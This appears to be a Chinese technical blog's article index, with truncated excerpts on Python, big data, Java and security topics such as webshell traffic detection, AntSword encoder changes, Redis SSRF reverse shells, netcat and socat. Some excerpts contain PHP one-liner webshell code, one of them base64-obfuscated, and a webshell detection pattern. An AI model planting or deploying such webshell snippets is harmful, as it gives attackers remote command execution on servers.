buffedon的博客

原创 【Python】乱码过滤

请求流量中的乱码处理

原创 【Python】超时请求或计算的处理

超时机制一般应用于处理阻塞问题

原创 【应急响应】 - Windows 排查分析

Windows应急响应，从用户、进程、文件信息、日志信息等方面进行排查

原创 【应急响应】- Linux 系统分析排查

应急响应 - Linux 分析排查。包括开机启动项、新增文件、网络连接、进程分析、异常用户分析、计划任务等

原创 【Web安全】Ysoserial 简单利用

Ysoserial 的简单使用，包括命令使用与简单原理解释

原创 【月度反思】202211

思维方式

翻译 【Windows安全日志】LogonType 取值说明

Windows安全日志——LogonType取值说明

原创 Linux基础知识

linux相关的基础知识，包括进程管理，内存管理，文件系统等

原创 【Git上传】上传大文件

利用 lfs上传大文件到 github

原创 【计算机视觉】- 卷积神经网络基础概念

卷积神经网络1. 卷积神经网络基础1.1 卷积卷积核填充(padding)步幅多输入通道多通道输出感受野1.2 池化池化参数1.3 激活函数1.4 批归一化 Batch Normalization1.5 丢弃法 Dropout2. 参考1. 卷积神经网络基础卷积、池化、ReLU、批归一化、丢弃法(Dropout)在 手写数字识别 项目中，是运用全连接层提取特征的，也就是将一张图片上的所有像素点展开形成 一维向量 输入网络，但是会存在两个问题输入数据的空间信息被丢失模型的参数过多，容易发生过拟合

原创 【Python模块】- 运用sys输入数据

运用sys输入数据sys.argv简介实验案例“sys” 即 “system” ，该模块提供了一些接口，用于访问 Python 解释器自身使用和维护的变量，同时模块中还提供了一部分函数，可以与解释器进行比较深度的交互sys.argv简介是一个列表对象，其中存储的是在命令行调用 Python 脚本时提供的“命令行参数”。这个列表中的第一个参数是被调用的脚本名称，也就是说，调用 Python 解释器的“命令”（python）本身并没有被加入这个列表当中。这个地方要注意一下，因为这一点跟 C 程序的行为

原创 【Python模块】- Numpy在AI中的应用

Numpy在AI中的应用1. 随机数(数组)操作2. 线性代数3. Numpy IO4. 计算激活函数Sigmoid 函数ReLU 函数5. 图像翻转、裁剪、亮度调整翻转裁剪亮度调整下采样1. 随机数(数组)操作生成随机数numpy.random.seed(10)#均匀分布numpy.random.rand(10,10) #创建指定形状(示例为10行10列)的数组(范围在0-1之间)numpy.random.uniform(0,100) #创建一个指定范围的数nump

原创 【Python模块】- Numpy

Numpy1. NumPy Ndarray 对象创建 Ndarray 对象2. Numpy 数据类型将数据类型应用于 Ndarrary3. Numpy 数组数组属性输出数组维度4. 创建数组5. 参考Numpy 是一个强大的 N 维数组。Numpy的矢量化、索引和广播概念快速且通用，是当今阵列计算的事实标准。数值计算工具。提供全面的数学函数、随机数生成器、线性代数例程、傅里叶变换等。1. NumPy Ndarray 对象NumPy 最重要的一个特点是其 N 维数组对象 ndarray，它是一系列同类

原创 【Python应用】- 更改md文件下的图片连接

原创 【环境配置】- 镜像源的更换

maven打包问题：在打包的过程中常常会遇到下载依赖出现问题，导致下载不成功，从而导致打包失败解决：在maven目录下找到 conf/settings.xml 文件，修改镜像源默认镜像源 <mirror> <id>mirrorId</id> <mirrorOf>repositoryId</mirrorOf> <name>Human Readable Name for this Mirror.&

原创 【Python环境】关于安装Python和PyCharm创建项目的说明

安装Python和PyCharm创建项目的说明环境准备下载Python库Python 解析器设置备注主要说明Python安装时默认有一个解析器在使用PyCharm的时候，PyCharm会默认给我创建一个虚拟的环境 venv，其中就有Python解析器，并且在下载Python库的时候，也会下载到此项目中指定的文件夹，和其他项目相互隔离，这样能够更好的管理Python库（便于管理依赖）环境准备安装Python，将其安装到 Python3.8 文件夹下使用 PyCharm 创建一个项目，路径如下

原创 【基础概念】域的相关概念

域的相关概念域名服务器 - DNS域内组的概念1. 域本地组2. 全局组3. 通用组域策略A-G-DL-PA-G-G-DL-PA-G-U-DL-P参考域是一个安全边界，是工作组的升级版，在域内的计算机可以共享资源域名是Internet上某一台计算机或计算机组的名称，用于在数据传输时标识计算机的电子方位（有时也指地理位置）。域名是由一串用点分隔的名字组成的，通常包含组织名，而且始终包括两到三个字母的后缀，以指明组织的类型或该域所在的国家或地区。例如：www.baidu.com域名服务器 - DNSDN

原创 【Python基础概念】闭包的简介

闭包闭包简介实现方式在函数内部调用函数在函数内部 返回函数名称globalnonlocal参考闭包简介闭包的实质就是函数的嵌套定义，就是在函数的内部在定义函数。使用闭包能够避免 函数内部的局部变量随着函数的调用结束而摧毁，因此使用闭包能够记录函数内局部变量的信息。闭包常常用在游戏中记录人物的移动位置，通过调用相关函数，实现游戏中人物的移动。如果不用闭包，每一次调用函数，游戏中的人物都要从起始坐标开始移动，很显然，这是不合理的。闭包有两种实现方式在函数内部调用函数在函数内部 返回函数名称通

原创 【理论知识】-- msf简介

payload模块的三种类型payload 模块主要有以下三种类型：Single、Stager、Stage。Single是一种完全独立的Payload，而且使用起来就像运行 calc.exe 一样简单，例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的，因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。Stager这种Payload负责建立目标用户与攻击者之间的网络连接，并下载额外的组件或应用程序。一种常见的Stager Payloa

原创 【大数据Flink】入门案例 -- WordCount（DataStream）

Flink经典入门案例--WordCount1. 环境准备2. 数据加载3. 数据处理3.1 切割3.2 标记3.3 分组3.4 聚合4. 数据输出源码下面主要是使用 DataStream 的方式去实现，在 Flink 1.14版本之后，DataSet 的方式被弃用，主要开始使用 DataStream 的方式这种方式有流处理和批处理两种方式，但是批处理 是用流处理模式做批处理，因此在最后要有一个启动的代码 env.execute()不能强制用 批处理去处理流数据1. 环境准备StreamExecu

原创 【JAVA基础】-- Fastjson简单使用

fastjson 使用首先区分 JAVA对象、JSON对象、JSON字符串JAVA对象：是java类的一个实例，有状态和行为。例如，一条狗是一个对象，它的状态有：颜色、名字、品种；行为有：摇尾巴、叫、吃等。JSON对象：类似于Key/Value 的形式，写在 {} 中。例如：{"key1":"value","key2":0}JSON字符串：就是一个字符串，一个整体，不截取的话不能使用JSON对象 var str1 = {"name": 'zhangsan',"sex": "man"}

原创 【大数据Flink】入门案例 -- WordCount

Flink-WordCount下面主要是使用 DataSet 的方式去实现，在 Flink 1.14版本之后，DataSet 的方式被弃用，主要开始使用 DataStream 的方式1. env 环境准备ExecutionEnvironment env = ExecutionEnvironment.getExecutionEnvironment();2. Source 加载数据用 , 分隔表示两行数据DataSet<String> lineDS = env.fromElements

原创 Lambda表达式

Lambda 表达式出现的意义1. 基础一：函数式接口2. 简化过程2.1 定义接口2.2 实现类2.3 主方法中实现一个对象实质属于函数式编程。在调用某个接口，并且重写某个方法的时候，常常使用 Lambda 表达式出现的意义避免匿名内部类定义过多一般情况下，某个类只用一次，往往会定义成内部类的形式，就是写在方法中。Lambda表达式也是内部类。简化代码1. 基础一：函数式接口只包含唯一一个 抽象方法 ，它就是一个函数式接口。在接口中，如果不特殊声明，默认是抽象方法对于函数式

原创 冰蝎加密通信特征

冰蝎加密通信特征密钥交换阶段通信阶段通用特征实例有填充字段分为密钥交换阶段和加密通信阶段密钥交换阶段：返回16位的密钥，是从md5中截取的（md5不区分大小写，解密后内容相同）加密通信阶段：base64加密，然后再AES 或 XOR 加密特征密钥交换阶段弱特征：urlurl: \.(php|jsp|asp|jspx|asa)\?(\w){1,10}=\d{2,3}HTTP/1.1 弱特征：responseBodyresponseBody: 16位的密钥

转载 哥斯拉流量特征已经检测思路

哥斯拉流量特征已经检测思路WebShell上传特征WebShell通信特征1.User-Agent (弱特征)2.Accept（弱特征）3.Cookie (强特征)4.请求体特征 (较强特征)5.响应体特征 (强特征)近日，网上发布了一款名为“哥斯拉”的webshell管理工具。与冰蝎类似，哥斯拉也采用了加密流量通信来躲避WAF等安全设备的检测，另外该工具自带了一些插件模块，实现了写内存webshell、与Meterpreter联动、bypass open_basedir等功能。由于哥斯拉实现了众多强大的

原创 蚁剑从入门到魔改【二】· 编解码器原理及改造

蚁剑编解码器原理蚁剑编解码器原理一、编码器编码器修改二、解码器蚁剑编解码器原理编码器：对发送流量进行编码，服务端进行解码解码器：对服务端对返回的流量进行解码一、编码器输入三个参数pwd：连接密码，类型string。data：传输的数据数组，类型string数组，。ext：一些扩展选项，在一些场景可能会用到。输出一个参数data: 编码器处理后的数组，这个你可以通过代理查看post提交了哪些数据，和这里的data是完全一样的下面是编码器默认生成的代码原理：将编码和解密后的代码 全都

原创 蚁剑从入门到魔改【一】

蚁剑从入门到魔改【一】一、明文通信二、密文通信三、自定义编解码source/core/php/index.jssource/core/php/base64.js自定义加密算法四、参考文章连接地址选用网卡一、明文通信特征=%40ini_setset_time_limit分析过程以 HTTP 流的形式 打开数据包在虚拟终端执行命令如上图：返回包首部和尾部有填充字符，分别是 117dd7689896 和 d3f7440 。对应了请求包中的 echo 的输出内容二、密文通信特

原创 一句话木马变形(编码)

一句话木马变形(编码)注意：如果全文只是加密的密文的话，那么就相当于是一个字符串，在解析的时候不符合语义，依然不会检测出来base64 编码php<?php$c = base64_decode('YXNzZXJ0');$c($_POST['pwd']);?>java语言<%@ Page Language="Jscript" Debug=true%><%var a=Request.Form("mr6");var res=System.Text.Encod

原创 【Python-LittleIdea】文件操作

一、自动创建文件每秒创建文件一次注意路径的格式、字符串前缀 f 的用法import timeimport randomlist=['<?php eval($_POST["pwd"]);','getPramater("a")','Runtime.exe()']if __name__ == '__main__': for i in range(0,3): fo=open(f'E:\\desktop\\FileCreate\\file{i}.txt','w')

原创 【Python模块学习】pyquery库解析数据

pyquery是模仿 jQuery 去做的，是一个强大的网页解析库。在爬虫的过程中，主要负责数据解析，将html数据转化为基本用法import requestsfrom pyquery import PyQuery as pqif __name__ == '__main__': rsp=requests.get('http://127.0.0.1/crawler/spider.html') rsp.encoding='utf-8' doc=pq(rsp.text)

原创 【Python模块学习】lxml库以及XPath的学习

lxml库lxml库1.lxml.etree2.子节点与子孙节点遍历子节点3.XPath-数据提权（重点）XPath 基本语法XPath 基本用法4.find函数参考文章lxml库lxml库是一款 Python数据解析库(用作数据提取)。也就是将html 或 xml 数据进行解析。为后续的正则匹配奠定基础1.lxml.etree在lxml库中，出场率最高的就是 lxml.etree，其次就是 Element 对象，在数据解析的时候，大量的代码就是基于 Element 对象的 API 进行解析的在爬

原创 【Python模块学习】pandas模块简介

pandas模块学习一、背景概述Pandas (Python Data Analysis Library) 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。numpy更加适用于科学计算领域；而pandas最初据说是设计用于金融领域，因此pandas可能更加适用于各类实际应用场景的处理。另一方面，numpy适用于处理“干净”的数据，及规范、无缺失的数据，而pandas更加擅长数据清洗(data munging)，这为后一步数据处理扫清障碍。Excel 可以处理少量的数据，但是当我们

原创 【Python模块学习】BeautifulSoup简介

BeautifulSoup是python 的一个库，最主要的功能就是 从网页爬取我们需要的数据。BeautifulSoup 将 html 解析为对象处理，全部页面转变为字典或者数组，相对于正则表达式的方式，可以大大简化处理过程BeautifulSoup 有四种对象：Tag、NavigableString、BeautifulSoup、CommentHTML 转化为对象的过程import requestsfrom bs4 import BeautifulSoupresponse=request.

原创 【Python模块学习】xlrd、xlwt模块处理excel文件

xlrd、xlwt模块处理 excel表格一、读取文档数据二、写数据到文档三、代码关键名词了解：sheet 相当于数据库中的一个tablecol 表中的列row 表中的行cell 某个单元格xls中的数据类型：0 empty1 string2 number3 data4 boolean5 error一、读取文档数据打开文件定位表格sheet读取数据二、写数据到文档新建xls文档在xls文档中新建 表格写入数据保存到

原创 Python 字符串前缀

Python 字符串前缀前缀 rif __name__ == '__main__': a=r"没有被转义/n" print(a)输出结果没有被转义/n前缀 ffor i in range(0, 3): x = f"var {i}" print(x)输出结果var 0var 1var 2前缀 bb"" 表示一个byte对象，str类型不能被加密，只能转换为byte类型import base64a = b"xx"n = base64.b

原创 Redis未授权攻击

Redis未授权攻击思路具体操作过程安装 RedisSSRF 漏洞攻击攻击 Redis参考文章SSRF + redis +反弹shellweblogic SSRF 之所以能够 getshell 的原因就是 有redis服务器的存在，利用redis 的备份功能，将反弹shell命令写入 crontab 中。写入命令到 crontab，用到了gopher协议，是gopher协议的数据格式反弹shell 利用了nc工具思路redis 版本 < 3.1首先通过 SSRF 进行端口的探

原创 内网转发简介

内网转发内网转发分类分类方式一 (按原理分)分类方式二 (按攻击手法分)端口转发，隧道，代理，反弹shell反弹shell的目的端口转发动态转发本地转发远程转发端口转发与端口映射代理参考文章在后渗透阶段，外网是无法访问内网的，因此可以通过 端口转发(隧道) 的方式，将web服务器作为代理，从而使得攻击者可以操控内网主机内网转发分类分类方式一 (按原理分)代理方式socketNetcat，netsh，LCXsocksEW，Ssocks隧道方式SSH，HTTP，IMCP

原创 Netcat工具使用简介

Netcat原理常用的参数功能介绍端口扫描信息传输文件传输反弹shell正向连接反向连接蜜罐原理linux nc 命令用于设置路由器有瑞士军刀的美称，能够读写 TCP 和 UDP 连接，基于socket 协议nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]

原创 系统命令——curl

系统命令——curlCurl 命令功能常用命令编写PHP脚本参考Curl 命令cURL是一个利用URL语法在命令行下工作的文件传输工具，它支持文件上传和下载，所以是综合传输工具支持下载的命令还有apt、yum、wget、nmp、git、curl支持很多中协议，HTTP，HTTPS，FTP等，使用Curl能够发起很多请求不仅仅支持linux，也支持windows功能获取请求响应内容数据传输 (上传文件，下载文件等)使用代理的方式进行请求使用cookie，伪造referer模拟用户

原创 隧道工具——socat

socat 命令1.原理2.使用方式监听反弹shell端口转发1.原理socat是强大易用的网络工具，可以实现任意socket的转换。可以看作是 netcat 的增强版socat 的主要特点就是 在两个数据流之间建立隧道；并且支持众多协议和链接方式：IP，TCP，UDP，IPv6，pipe，exec，system，open，proxy，openssl，socket等2.使用方式socat [options] <address> <address>监听socat